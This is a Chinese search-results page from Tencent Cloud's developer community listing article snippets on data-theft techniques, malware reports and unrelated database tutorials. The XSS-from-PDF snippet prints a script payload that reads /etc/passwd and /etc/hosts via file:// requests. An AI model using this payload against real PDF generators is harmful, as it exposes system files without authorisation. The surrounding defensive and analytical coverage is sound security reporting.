- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全
攻防实战:数据窃取技术详解
一、概述(Overview)数据窃取是指未经授权地、隐蔽地将敏感数据从受控的内部网络复制并转移到攻击者控制的外部位置的过程。 网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 二、数据窃取的核心用途(CoreUseCasesofDataExfiltration)直接窃取数据(DirectDataTheft/TraditionalExfiltration):-**场景**:将收集到的敏感数据从组织网络单向移出到攻击者控制的服务器 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。
56541编辑于 2025-12-31 - 来自专栏Khan安全团队
XSS 从 PDF 中窃取数据
<script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
33910编辑于 2025-04-28 - 来自专栏FreeBuf
黑客窃取有无线解锁功能的汽车的7种姿势
下面,我将为大家介绍一些目前黑客最常用的窃取无线解锁汽车的姿势。 1.中继攻击 ? 汽车钥匙始终保持在线状态,可以说是一个非常的严重的安全问题。 与家庭的的的Wi-Fi网络一样,只要黑客设法渗透到你汽车的本地网络就可以轻松做到,甚至还可以窃取你的个人隐私数据。 此外,这是一个物理安全问题。 这是一个接口,允许工程师访问你的汽车数据,以读取错误代码,统计数据,甚至编写新密钥。 事实证明,任何人都可以通过购买漏洞利用工具包来利用这个端口复制密钥,并编程新密钥用它们来窃取车辆。 安全建议:。 7.网络钓鱼 ? 网络钓鱼可以说是一种非常古老而又常见的黑客技术。随着车联网的发展,网络钓鱼也开始延伸到汽车网络,特别是那些具有互联网连接和内置网络浏览器的车型。
1K10发布于 2018-11-22 - 来自专栏全栈工程师修炼之路
7.Redis数据库容灾备份企业实战
>> delete.log find ${BACKUPDIR} -type f -mtime +7 -exec rm -rf {} \; 2.迁移Redis指定db-数据库 方式1.同主机db迁移到另外一个 /redis-node-172.16.243.97-6379-d97cb5b15b7130ca0bd5322758e0c2dce061fd7b.rdb' # Transfer finished with redis-recovery --from-file=$(pwd)/redis.conf kubectl create --save-config -f redisrecovery.yaml # 7. 0m0.199s /nfsdisk-31/datastore/redis/demo2/data# ls -alh # -rw-r--r-- 1 root root 41M Sep 7 \e[0m" kubectl get pod -n database -l app=redis-cluster-recovery # 7.redis集群快速创建配置 echo -e "yes" |
2.7K20编辑于 2022-09-28 - 来自专栏FreeBuf
防范数据窃取从了解其手法做起
数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 以避免Zip炸弹) 7zip RAR CAB Tar (+/- gzip) WIM image 物理 如果攻击者或恶意的内部工作人员具有物理访问权限,那么我们又该怎么做? www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/ 磁:ODINI和MAGNETO攻击可以利用计算机处理器产生的磁信号来窃取数据
73530发布于 2018-08-21 - 来自专栏安恒网络空间安全讲武堂
用css绕过同源策略跨域窃取数据
font-family属性的值,即单引号内的,所 以这也将成为一个前置条件,那就是要窃取的数据中不能同时出现单双引号。 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取的数据必须在payload1和payload2之间。 要窃取的数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取的数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取的数据。”font-family”是最佳的选择。
1.5K90发布于 2018-02-06 - 来自专栏网络安全
DeepSeek 恶意 Python 包,正在窃取你的数据
研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。
51910编辑于 2025-02-06 - 来自专栏不做码农的开发者
【asp.net core】7 实战之 数据访问层定义
好的,不废话了,进入今天的议题:完成并实现数据层的基础实现。 ? 1. 数据实体 通常情况下,一个项目的数据实体中字段并不是完全没有规律可寻。通常情况下,必须有一个主键。 有些时候,会要求在数据表中增加上次修改时间和创建时间,以及创建人和修改人的主键。 常见数据操作接口 在正常开发中,一个完整的数据操作接口会有很多分类,但是很多时候我们需要分开增删改和查询这两种操作。 对于数据库而言,视图和有些数据表都是不被允许改变的,这时候就需要我们只对调用方开放查询接口,而不开放修改接口。 /// /// <returns></returns> int Count(); ///
/// 返回数据库中的数据条目,类型为Long /// </summary 1.1K40发布于 2020-06-09 - 来自专栏全栈程序员必看
Activiti7实战-入门
2.4 创建mysql数据库 数据库表的命名规则 Activiti 的表都以 **ACT_**开头。 这些运行时的表,包含流程实例,任务,变量,异步任务, 等运行中的数据。 Activiti 只在流程实例执行过程中保存这些数据, 在流程结束时就会删 除这些记录。 这样运行时表可以一直很小速度很快。 的定义、数据源定义、事务管理器等,此文件其实就是一个 spring 配置文件,下面是一个基本的配置只配置ProcessEngineConfiguratio和数据源 <beans xmlns="http: SpringBoot Activiti<em>7</em> 发布正式版之后,它与 SpringBoot2.x 已经完全支持整合开发。 我们可以将 Activiti<em>7</em> 与SpringBoot 整合开发的坐标引入到工程中,从而达到 SpringBoot 支持 Activti<em>7</em> 整合。
83720编辑于 2022-11-19 - 来自专栏大数据文摘
“窃取用户数据”?看阿里如何应对
支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据,数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 基于这样的理解,我们认为数据的商业价值在于运用而不在控制,我们认为数据只有在交换、分享中才能发挥更大的价值,数据会越用价值越高。因此,我们并不担心获取数据的途径,更绝不会用不光彩的手段去获取数据! 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 4、大数据是无数用户的个体数据积累起来的,但看起来运用和发挥数据价值似乎变成了大机构的专利。这其中如何具体保护客户的隐私和利益?大数据对于每个人的价值又在哪里?
69950发布于 2018-05-21 - 来自专栏火绒安全
AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据
当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。
73620编辑于 2022-05-20 - 来自专栏叽叽西
7. Git 命令实战
简而言之 -- mirror 强制推送 all refs under refs/ 下的所有. 保持绝对的同步.
49010编辑于 2022-05-17 - 来自专栏单细胞天地
RNAvelocity7:scVelo实战
以下分析基于内置胰腺数据集[3]。 [7]: scv.tl.velocity_graph(adata) computing velocity graph finished (0:00:12) --> added 'velocity_graph 以下分析基于内置 齿状回数据集[5]。 此外,我们可以通过scv.tl.terminal_states沿着马尔科夫链追踪细胞的起源和潜在命运,从而在轨迹中获取根细胞和终点: [7]: scv.tl.velocity_graph(adata) Granule immature Granule mature Microglia Mossy Neuroblast OL OPC Radial Glia-like nIPC 0 Phkg1 Utrn Golga7b
2.2K32发布于 2021-10-09 - 来自专栏EdisonTalk
MongoDB入门实战教程(7)
本系列教程目录: MongoDB入门实战教程(1) MongoDB入门实战教程(2) MongoDB入门实战教程(3) MongoDB入门实战教程(4) MongoDB入门实战教程(5) MongoDB入门实战教程(6) 前面我们学习了聚合查询,本篇我们来看看在模型设计中如何应用引用模式来提高查询效率。 2 引用模式 万级长度的内嵌数组 这里我们仍然适用上面提到的Contacts模型,假设其中的groups是一个内嵌数组,这个groups的数据可能有百万级的长度,且每个Contacts文档都需要冗余这么一份数据 ,而且groups数据还面临着频繁修改的需求。 参考资料 唐建法,《MongoDB高手课》(极客时间) 郭远威,《MongoDB实战指南》(图书)
1.2K10发布于 2021-06-22 - 来自专栏AI科技大本营的专栏
这 7 种窃取数据的新手段快来认识一下!
而机器学习使用的算法,是利用了先前的数据集和统计分析来做出假设并对行为进行判断的。 由机器学习算法提供支持的软件或计算机有一个优势:可以执行尚未被编程执行的功能。 今天咱们就来看看,黑客使用机器学习来窃取数据的 7 种手段。 社会工程攻击 人类是网络安全链中最薄弱的一环,网络犯罪分子对此深有体会。 社会工程攻击的增长趋势也证明了这一点。 借助机器学习,黑客可以抓住机会,收集企业、员工及其合作伙伴的敏感数据。更糟糕的是,机器学习可以复制基于社交工程的攻击,所以他们不需要太多时间来完成此任务。 我们已经看到流氓软件可以通过改变行为模式来躲过安全保护系统的识别,所以最关键的,是要保证你的杀毒软件维持在最新版本状态,并对数据进行备份。 原文:https://hackernoon.com/7-sneaky-ways-hackers-are-using-machine-learning-to-steal-your-data-d0933w6a
68320发布于 2020-04-23 154个数据库被黑客窃取?ASML回应
该黑客声称,此次窃取的信息涵盖多类敏感数据,包括磁盘加密密钥、用户数据(用户名/密码)、软件信息以及特定设备的详细信息。 如果消息属实,这将远远超出一般的客户数据泄露事件,将会对ASML公司带来严重的负面影响。这意味着攻击者攻破了ASML的安全系统,并可以访问ASML公司高度敏感的数据。 不过,ASML在最新发布的声明中否认了公司遭黑客窃取数据的说法。 “ASML注意到2026年1月6日在BreachForums上发布的一篇帖子,该帖子声称公司信息被泄露。 所提及的文档中没有来自ASML的数据。”ASML在声明中写道。 第三方的安全研究团队经过分析后也认为,黑客“1011”兜售的所谓ASML的数据实际上毫无用处。 此外,研究人员还发现,黑客“1011”与本周早些时候宣布NordVPN数据泄露的攻击者是同一人。NordVPN公司随后也否认丢失任何数据,该公司代表称这些说法“不实”。
8810编辑于 2026-03-19浏览器“隐私”扩展被曝窃取AI对话数据
浏览器“隐私”扩展被曝窃取AI对话数据据Koi Security的研究报告,四款声称保护隐私的流行浏览器扩展程序实则背道而驰。 这些恶意插件一直在窃取超过800万用户的聊天机器人对话文本,并将其发送回开发者。 他说,“隐私政策则揭示数据会被出售用于营销。”他补充道,在2025年7月之前安装Urban VPN的用户从未看到过同意提示,该提示是通过5.5.0版本的静默更新添加的。 他说,“要么是审核没有检查从某中心自家AI产品(Gemini)窃取对话的代码,要么是检查了但不认为这是个问题。” 达迪克曼总结道,“请假设自2025年7月以来你进行的所有AI对话都已被捕获并分享给了第三方。”
32210编辑于 2026-01-01- 来自专栏有关SQL
数据工程师必须掌握的7个大数据实战项目
接下来,我整理一些大数据已经发挥它真正作用的应用场景,如果你要做大数据项目,肯定离不开这7个范畴。 因此,你说大数据离我们远吗,我说肯定很近。不管你信不信,反正我信了。 2 ---- 项目一:数据整合 说到数据整合,我们做数据的人,一般想到的是数据仓库。 ? Oliver 的文章《the 7 most common Hadoop and Spark projects》以及其他百度文库参考资料 - https://www.javaworld.com/article /2972303/the-7-most-common-hadoop-and-spark-projects.html Oliver 就是《7周7编程语言》的作者 https://www.techworld.com.au /article/455387/epic_codefest_7_programming_languages_7_days/ 完
2.6K10发布于 2019-12-31 - 来自专栏伪架构师
Knative 入门系列7:实战演练
我们进行一个演练,它利用了您前面所学到的许多知识,并通过使用美国地质勘探局 (USGS) 地震数据源的数据提供了一个服务,以可视化地展示世界各地的地震活动。 事件源,它将在给定的时间间隔轮询 USGS 提供的数据。 arch 图 7-1 应用程序的体系结构。来自于 USGS 的地震数据源作为事件进入我们的事件源,这将触发我们的 GeoCoder 服务来持久化事件。 与运行在 Kubernetes 上的 Postgres 数据库通信。 对我们服务的 HTTP POST 请求将会在数据库中记录事件,而 GET 请求将检索过去24小时内发生的事件。让我们来看一下 示例 7-1 中我们服务的代码。
2K30发布于 2019-07-23 - 来自专栏Crossin的编程教室
Python 实战(7):连连看
除此之外,数据库里还有其他很多信息我们没有用上,比如演员和导演。这些信息还有个重要的作用,就是把不同的影片关联起来。比如你看了一部电影,对其主演感兴趣,自然就想知道他还演过什么影片。 而我在抓取时,将其简化,只是选取了其中的姓名,用逗号(,)拼接起来,作为一个字符串存储在数据库中。
1.3K80发布于 2018-04-16
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号